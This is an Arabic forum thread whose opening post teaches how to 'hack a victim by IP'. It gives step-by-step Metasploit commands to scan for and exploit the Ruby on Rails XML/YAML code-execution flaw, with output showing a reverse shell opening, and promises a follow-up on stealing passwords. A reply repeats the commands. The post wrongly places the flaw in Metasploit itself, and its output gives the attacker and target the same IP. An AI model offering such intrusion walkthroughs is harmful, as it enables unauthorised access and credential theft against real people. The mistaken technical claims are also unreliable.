درس استغلال ثغره الميتاسبلويت لاختراق الضحيه عبر ip

اليوم سوف اتحدث عن ثغره في برنامج الميتاسبلويت لاختراق انظمة الويندوز واللينكس والثغره تكمن في لغة البرمجه ruby


وطبعا برنامج الميتاسبلويت مصنوع من لغة البرمجه ruby ...خطوات واوامرلاكشاف الثغره:

msf> use auxiliary/scanner/http/rails_xml_yaml_scanner
msf auxiliary(rails_xml_yaml_scanner) > set RHOSTS (اي بي الضحيه)
msf auxiliary(rails_xml_yaml_scanner) > set RPORT 80
msf auxiliary(rails_xml_yaml_scanner) > set THREADS 128
msf auxiliary(rails_xml_yaml_scanner) > run



رح تشوف في برنامج الميتاسبلويت كالتالي
RubyVuln.png



اذا شفت في الصوره :
[+] 192.168.0.4:80 is likely vulnerable due to a 500 reply for invalid YAML


االان ارويكم كيف تستغلوا الثغره ruby في برنامج المتياسبوليت عند الضحيه: الاوامر للاختراقه

msf> use exploit/multi/http/rails_xml_yaml_code_exec
msf exploit(rails_xml_yaml_code_exec) > set RHOST 192.168.0.4
msf exploit(rails_xml_yaml_code_exec) > set RPORT 80
msf exploit(rails_xml_yaml_code_exec) > exploit

[*] Reloading module...
[*] Started reverse handler on 192.168.0.4:4444
[*] Sending Railsv3 request to 192.168.0.4:80...
[*] Sending Railsv2 request to 192.168.0.4:80...
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:53719) at 2013-02-4 03:07:54 -0600

ورح الان يفتح shell بيني وبين الضحيه والدرس القادم ان شاء الله رح ارويكم كيف تسرقوا الباسوردات عبر meterpreter

تحياتي لكم

اسطورة سيئون
 

mohamed samy

New member
msf> use auxiliary/scanner/http/rails_xml_yaml_scanner
msf auxiliary(rails_xml_yaml_scanner) > set rhosts (اي بي الضحيه)
msf auxiliary(rails_xml_yaml_scanner) > set rport 80
msf auxiliary(rails_xml_yaml_scanner) > set threads 128
msf auxiliary(rails_xml_yaml_scanner) > run


اسطورة سيئون




msf> use exploit/multi/http/rails_xml_yaml_code_exec
msf exploit(rails_xml_yaml_code_exec) > set rhost 192.168.0.4
msf exploit(rails_xml_yaml_code_exec) > set rport 80
msf exploit(rails_xml_yaml_code_exec) > exploit

[*] reloading module...
[*] started reverse handler on 192.168.0.4:4444
[*] sending railsv3 request to 192.168.0.4:80...
[*] sending railsv2 request to 192.168.0.4:80...
[*] command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:53719) at 2013-02-4 03:07:54 -0600


اسطورة سيئون

مشكور اخى
كنت عايز اسال اية الفرق بين الكود الاول والتانى ومعلش اعذرنى انا مبتدئ
 
أعلى